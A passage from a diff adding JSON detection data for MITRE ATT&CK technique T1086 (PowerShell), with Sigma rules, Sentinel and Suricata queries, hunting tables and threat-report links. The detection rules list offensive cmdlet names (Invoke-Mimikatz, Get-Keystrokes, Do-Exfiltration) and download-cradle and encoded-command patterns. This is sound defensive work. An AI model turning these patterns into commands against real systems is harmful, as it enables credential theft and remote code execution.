"CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + ], + "level": "medium" + }, + { + "title": "WMI Spawning Windows PowerShell", + "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "status": "experimental", + "description": "Detects WMI spawning PowerShell", + "references": [ + "https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_shell_spawn_susp_program.yml", + "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e" + ], + "author": "Markus Neis / @Karneades", + "date": "2019/04/03", + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1064" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": [ + "*\\wmiprvse.exe" + ], + "Image": [ + "*\\powershell.exe" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "AppvClient", + "CCM" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "LMD - Hash Compare" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD - Hash Compare" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + 
"https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "http://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + 
"https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.group-ib.com/blog/cobalt", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + 
"https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", NaN + ] + }, + { + "technique_id": "T1086", + "command_list": [ + "excel.exe", + "cmd.exe", + "powershell.exe", + "mshta.exe", + "powerpoint.exe", + "powershell.exe webClient.DownloadString(", + "powershell.exe webClient.DownloadFile", + "powershell.exe webClient.DownloadData", + "winword.exe", + "\\\\Windows\\\\.+\\\\WindowsPowerShell\\\\.+\\\\powershell.exehidden|-enc|-NonI", + "powershell/lateral_movement/invoke_psremoting", + "powershell/management/spawn", + "python/management/multi/spawn" + ], + "commands": [ + { + "command": "excel.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "cmd.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "powershell.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_2" + }, + { + "command": "powershell.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "mshta.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powerpoint.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powershell.exe webClient.DownloadString(", + "source": "Threat Hunting Tables", + "name": "" + }, + { + 
"command": "powershell.exe webClient.DownloadFile", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell.exe webClient.DownloadData", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "winword.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "\\\\Windows\\\\.+\\\\WindowsPowerShell\\\\.+\\\\powershell.exehidden|-enc|-NonI", + "source": "SysmonHunter - PowerShell", + "name": "" + }, + { + "command": "powershell/lateral_movement/invoke_psremoting", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/spawn", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/management/multi/spawn", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "chain_id": "100025", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "powershell.exe", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "chain_id": "100029", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "powershell.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "chain_id": "100042", + "os": "windows", + "parent_process": "mshta.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + 
"sub_process_2": "powershell.exe", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1086", + "itw_sample": "3560481cc51a08c94cd5649b2782ec1395d56d9a1721e6e03720420898772ed0" + }, + { + "chain_id": "100045", + "os": "windows", + "parent_process": "mshta.exe", + "commandline_string": "", + "sub_process_1": "powershell.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1086", + "itw_sample": "ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6" + }, + { + "chain_id": "100056", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "powershell.exe", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "chain_id": "100060", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "powershell.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "chain_id": "100064", + "os": "windows", + "parent_process": "powershell.exe", + "commandline_string": "webClient.DownloadString(", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "chain_id": "100065", + "os": "windows", + "parent_process": 
"powershell.exe", + "commandline_string": "webClient.DownloadFile", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "chain_id": "100066", + "os": "windows", + "parent_process": "powershell.exe", + "commandline_string": "webClient.DownloadData", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "https://www.joesandbox.com/analysis/35219/0/html" + }, + { + "chain_id": "100092", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "powershell.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "name": "PowerShell", + "description": null, + "level": "high", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\WindowsPowerShell\\\\.+\\\\powershell.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "hidden|-enc|-NonI" + } + } + } + ] + }, + { + "Empire Module": "powershell/lateral_movement/invoke_psremoting", + "ATT&CK Technique #1": "T1086", + "ATT&CK Technique #2": "", + "Technique": "PowerShell", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_psremoting\": [\"T1086\"]," + }, + { + "Empire Module": "powershell/management/spawn", + "ATT&CK Technique #1": "T1086", + "ATT&CK Technique #2": "", + "Technique": "PowerShell", + "Concatenate for Python Dictionary": "\"powershell/management/spawn\": [\"T1086\"]," + }, + { + 
"Empire Module": "python/management/multi/spawn", + "ATT&CK Technique #1": "T1086", + "ATT&CK Technique #2": "", + "Technique": "PowerShell", + "Concatenate for Python Dictionary": "\"python/management/multi/spawn\": [\"T1086\"]," + }, + { + "Rules": "ET Pro", + "SID": "2027168", + "Signature": "ET POLICY Powershell Activity Over SMB - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2027169", + "Signature": "ET POLICY Powershell Command With No Profile Argument Over SMB - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2027170", + "Signature": "ET POLICY Powershell Command With Hidden Window Argument Over SMB - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2027171", + "Signature": "ET POLICY Powershell Command With Execution Bypass Argument Over SMB - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2027172", + "Signature": "ET POLICY Powershell Command With Encoded Argument Over SMB - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2027173", + "Signature": "ET POLICY Powershell Command With NonInteractive Argument Over SMB - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2025704", + "Signature": "ET POLICY SMB NT Create AndX Request For a Powershell .ps1 File", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2025705", + "Signature": "ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_path contains \"powershell.exe\"or process_path contains \"powershell_ise.exe\"or process_path contains \"psexec.exe\")", + "name": "PowerShell" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_command_line contains \"*.Download*\"or process_command_line contains 
\"*Net.WebClient*\")", + "name": "PowerShell Downloads Process" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY Powershell Activity Over SMB - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY Powershell Command With No Profile Argument Over SMB - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY Powershell Command With Hidden Window Argument Over SMB - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY Powershell Command With Execution Bypass Argument Over SMB - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY Powershell Command With Encoded Argument Over SMB - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY Powershell Command With NonInteractive Argument Over SMB - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY SMB NT Create AndX Request For a Powershell .ps1 File", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File", + "name": "ET Pro Rule" + } + ], + "possible_detections": [ + { + "title": "APT29", + "id": "033fe7d6-66d1-4240-ac6b-28908009c71f", + "description": "This method detects a suspicious powershell command line combination as used by APT29 in a campaign against US think tanks", + "references": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/" + ], + "tags": [ + "attack.execution", + "attack.g0016", + "attack.t1086" + ], + "author": "Florian Roth", + "date": "2018/12/04", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + 
"selection": { + "CommandLine": "*-noni -ep bypass $*" + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "action": "global", + "title": "Empire Monkey", + "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "description": "Detects EmpireMonkey APT reported Activity", + "references": [ + "https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b" + ], + "tags": [ + "attack.t1086", + "attack.execution" + ], + "date": "2019/04/02", + "author": "Markus Neis", + "detection": { + "condition": "1 of them" + }, + "falsepositives": [ + "Very Unlikely" + ], + "level": "critical" + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_cutil": { + "CommandLine": [ + "*/i:%APPDATA%\\logs.txt scrobj.dll" + ], + "Image": [ + "*\\cutil.exe" + ] + }, + "selection_regsvr32": { + "CommandLine": [ + "*/i:%APPDATA%\\logs.txt scrobj.dll" + ], + "Description": [ + "Microsoft(C) Registerserver" + ] + } + } + }, + { + "title": "PowerShell Downgrade Attack", + "id": "6331d09b-4785-4c13-980f-f96661356249", + "status": "experimental", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "references": [ + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1086" + ], + "author": "Florian Roth (rule), Lee Holmes (idea)", + "logsource": { + "product": "windows", + "service": "powershell-classic" + }, + "detection": { + "selection": { + "EventID": 400, + "EngineVersion": "2.*" + }, + "filter": { + "HostVersion": "2.*" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Penetration Test", + "Unknown" + ], + "level": "medium" + }, + { + "title": "PowerShell called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + 
"status": "experimental", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "references": [ + "https://adsecurity.org/?p=2921" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1086" + ], + "author": "Sean Metcalf (source), Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell-classic" + }, + "detection": { + "selection1": { + "EventID": 400, + "EngineVersion": [ + "2.*", + "4.*", + "5.*" + ], + "HostVersion": "3.*" + }, + "condition": "selection1" + }, + "falsepositives": [ + "Penetration Tests", + "Unknown" + ], + "level": "high" + }, + { + "title": "Malicious PowerShell Commandlets", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "experimental", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "modified": "2019/01/22", + "references": [ + "https://adsecurity.org/?p=2921" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Sean Metcalf (source), Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell", + "definition": "It is recommended to use the new \"Script Block Logging\" of PowerShell v5 https://adsecurity.org/?p=2277" + }, + "detection": { + "keywords": { + "Message": [ + "*Invoke-DllInjection*", + "*Invoke-Shellcode*", + "*Invoke-WmiCommand*", + "*Get-GPPPassword*", + "*Get-Keystrokes*", + "*Get-TimedScreenshot*", + "*Get-VaultCredential*", + "*Invoke-CredentialInjection*", + "*Invoke-Mimikatz*", + "*Invoke-NinjaCopy*", + "*Invoke-TokenManipulation*", + "*Out-Minidump*", + "*VolumeShadowCopyTools*", + "*Invoke-ReflectivePEInjection*", + "*Invoke-UserHunter*", + "*Find-GPOLocation*", + "*Invoke-ACLScanner*", + "*Invoke-DowngradeAccount*", + "*Get-ServiceUnquoted*", + "*Get-ServiceFilePermission*", + "*Get-ServicePermission*", + "*Invoke-ServiceAbuse*", + "*Install-ServiceBinary*", + "*Get-RegAutoLogon*", + "*Get-VulnAutoRun*", + 
"*Get-VulnSchTask*", + "*Get-UnattendedInstallFile*", + "*Get-ApplicationHost*", + "*Get-RegAlwaysInstallElevated*", + "*Get-Unconstrained*", + "*Add-RegBackdoor*", + "*Add-ScrnSaveBackdoor*", + "*Gupt-Backdoor*", + "*Invoke-ADSBackdoor*", + "*Enabled-DuplicateToken*", + "*Invoke-PsUaCme*", + "*Remove-Update*", + "*Check-VM*", + "*Get-LSASecret*", + "*Get-PassHashes*", + "*Show-TargetScreen*", + "*Port-Scan*", + "*Invoke-PoshRatHttp*", + "*Invoke-PowerShellTCP*", + "*Invoke-PowerShellWMI*", + "*Add-Exfiltration*", + "*Add-Persistence*", + "*Do-Exfiltration*", + "*Start-CaptureServer*", + "*Get-ChromeDump*", + "*Get-ClipboardContents*", + "*Get-FoxDump*", + "*Get-IndexedItem*", + "*Get-Screenshot*", + "*Invoke-Inveigh*", + "*Invoke-NetRipper*", + "*Invoke-EgressCheck*", + "*Invoke-PostExfil*", + "*Invoke-PSInject*", + "*Invoke-RunAs*", + "*MailRaider*", + "*New-HoneyHash*", + "*Set-MacAttribute*", + "*Invoke-DCSync*", + "*Invoke-PowerDump*", + "*Exploit-Jboss*", + "*Invoke-ThunderStruck*", + "*Invoke-VoiceTroll*", + "*Set-Wallpaper*", + "*Invoke-InveighRelay*", + "*Invoke-PsExec*", + "*Invoke-SSHCommand*", + "*Get-SecurityPackages*", + "*Install-SSP*", + "*Invoke-BackdoorLNK*", + "*PowerBreach*", + "*Get-SiteListPassword*", + "*Get-System*", + "*Invoke-BypassUAC*", + "*Invoke-Tater*", + "*Invoke-WScriptBypassUAC*", + "*PowerUp*", + "*PowerView*", + "*Get-RickAstley*", + "*Find-Fruit*", + "*HTTP-Login*", + "*Find-TrustedDocuments*", + "*Invoke-Paranoia*", + "*Invoke-WinEnum*", + "*Invoke-ARPScan*", + "*Invoke-PortScan*", + "*Invoke-ReverseDNSLookup*", + "*Invoke-SMBScanner*", + "*Invoke-Mimikittenz*" + ] + }, + "false_positives": [ + "Get-SystemDriveInfo" + ], + "condition": "keywords and not false_positives" + }, + "falsepositives": [ + "Penetration testing" + ], + "level": "high" + }, + { + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "experimental", + "description": "Detects keywords from well-known 
PowerShell exploitation frameworks", + "modified": "2019/01/22", + "references": [ + "https://adsecurity.org/?p=2921" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Sean Metcalf (source), Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell", + "definition": "It is recommended to use the new \"Script Block Logging\" of PowerShell v5 https://adsecurity.org/?p=2277" + }, + "detection": { + "keywords": { + "Message": [ + "*AdjustTokenPrivileges*", + "*IMAGE_NT_OPTIONAL_HDR64_MAGIC*", + "*Microsoft.Win32.UnsafeNativeMethods*", + "*ReadProcessMemory.Invoke*", + "*SE_PRIVILEGE_ENABLED*", + "*LSA_UNICODE_STRING*", + "*MiniDumpWriteDump*", + "*PAGE_EXECUTE_READ*", + "*SECURITY_DELEGATION*", + "*TOKEN_ADJUST_PRIVILEGES*", + "*TOKEN_ALL_ACCESS*", + "*TOKEN_ASSIGN_PRIMARY*", + "*TOKEN_DUPLICATE*", + "*TOKEN_ELEVATION*", + "*TOKEN_IMPERSONATE*", + "*TOKEN_INFORMATION_CLASS*", + "*TOKEN_PRIVILEGES*", + "*TOKEN_QUERY*", + "*Metasploit*", + "*Mimikatz*" + ] + }, + "condition": "keywords" + }, + "falsepositives": [ + "Penetration tests" + ], + "level": "high" + }, + { + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "experimental", + "description": "Detects PowerShell calling a credential prompt", + "references": [ + "https://twitter.com/JohnLaTwC/status/850381440629981184", + "https://t.co/ezOTGy1a1G" + ], + "tags": [ + "attack.execution", + "attack.credential_access", + "attack.t1086" + ], + "author": "John Lambert (idea), Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell", + "definition": "Script block logging must be enabled" + }, + "detection": { + "selection": { + "EventID": 4104 + }, + "keyword": { + "Message": [ + "*PromptForCredential*" + ] + }, + "condition": "all of them" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "PowerShell PSAttack", + "id": 
"b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "status": "experimental", + "description": "Detects the use of PSAttack PowerShell hack tool", + "references": [ + "https://adsecurity.org/?p=2921" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Sean Metcalf (source), Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell", + "definition": "It is recommended to use the new \"Script Block Logging\" of PowerShell v5 https://adsecurity.org/?p=2277" + }, + "detection": { + "selection": { + "EventID": 4103 + }, + "keyword": [ + "PS ATTACK!!!" + ], + "condition": "all of them" + }, + "falsepositives": [ + "Pentesters" + ], + "level": "high" + }, + { + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "experimental", + "description": "Detects Base64 encoded Shellcode", + "references": [ + "https://twitter.com/cyb3rops/status/1063072865992523776" + ], + "tags": [ + "attack.privilege_escalation", + "attack.execution", + "attack.t1055", + "attack.t1086" + ], + "author": "David Ledbetter (shellcode), Florian Roth (rule)", + "date": "2018/11/17", + "logsource": { + "product": "windows", + "service": "powershell", + "description": "Script block logging must be enabled" + }, + "detection": { + "selection": { + "EventID": 4104 + }, + "keyword1": [ + "*AAAAYInlM*" + ], + "keyword2": [ + "*OiCAAAAYInlM*", + "*OiJAAAAYInlM*" + ], + "condition": "selection and keyword1 and keyword2" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "Suspicious PowerShell Download", + "id": "65531a81-a694-4e31-ae04-f8ba5bc33759", + "status": "experimental", + "description": "Detects suspicious PowerShell download command", + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "powershell" + }, + "detection": { + "keywords": { + "Message": [ + "*System.Net.WebClient).DownloadString(*", + 
"*system.net.webclient).downloadfile(*" + ] + }, + "condition": "keywords" + }, + "falsepositives": [ + "PowerShell scripts that download content from the Internet" + ], + "level": "medium" + }, + { + "title": "Suspicious PowerShell Invocations - Generic", + "id": "3d304fda-78aa-43ed-975c-d740798a49c1", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell" + }, + "detection": { + "encoded": [ + " -enc ", + " -EncodedCommand " + ], + "hidden": [ + " -w hidden ", + " -window hidden ", + " - windowstyle hidden " + ], + "noninteractive": [ + " -noni ", + " -noninteractive " + ], + "condition": "all of them" + }, + "falsepositives": [ + "Penetration tests", + "Very special / sneaky PowerShell scripts" + ], + "level": "high" + }, + { + "title": "Suspicious PowerShell Invocations - Specific", + "id": "fce5f582-cc00-41e1-941a-c6fabf0fdb8c", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell" + }, + "detection": { + "keywords": { + "Message": [ + "* -nop -w hidden -c * [Convert]::FromBase64String*", + "* -w hidden -noni -nop -c \"iex(New-Object*", + "* -w hidden -ep bypass -Enc*", + "*powershell.exe reg add HKCU\\software\\microsoft\\windows\\currentversion\\run*", + "*bypass -noprofile -windowstyle hidden (new-object system.net.webclient).download*", + "*iex(New-Object Net.WebClient).Download*" + ] + }, + "condition": "keywords" + }, + "falsepositives": [ + "Penetration tests" + ], + "level": "high" + }, + { + "title": "Suspicious PowerShell Keywords", + "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", + "status": "experimental", + "description": "Detects 
keywords that could indicate the use of some PowerShell exploitation framework", + "date": "2019/02/11", + "author": "Florian Roth", + "references": [ + "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "logsource": { + "product": "windows", + "service": "powershell", + "definition": "It is recommended to use the new \"Script Block Logging\" of PowerShell v5 https://adsecurity.org/?p=2277" + }, + "detection": { + "keywords": { + "Message": [ + "*[System.Reflection.Assembly]::Load*" + ] + }, + "condition": "keywords" + }, + "falsepositives": [ + "Penetration tests" + ], + "level": "high" + }, + { + "title": "Malicious PowerShell Commandlet Names", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "experimental", + "description": "Detects the creation of known powershell scripts for exploitation", + "references": [ + "https://raw.githubusercontent.com/Neo23x0/sigma/f35c50049fa896dff91ff545cb199319172701e8/rules/windows/powershell/powershell_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Markus Neis", + "date": "2018/04/07", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 11, + "TargetFilename": [ + "*\\Invoke-DllInjection.ps1", + "*\\Invoke-WmiCommand.ps1", + "*\\Get-GPPPassword.ps1", + "*\\Get-Keystrokes.ps1", + "*\\Get-VaultCredential.ps1", + "*\\Invoke-CredentialInjection.ps1", + "*\\Invoke-Mimikatz.ps1", + "*\\Invoke-NinjaCopy.ps1", + "*\\Invoke-TokenManipulation.ps1", + 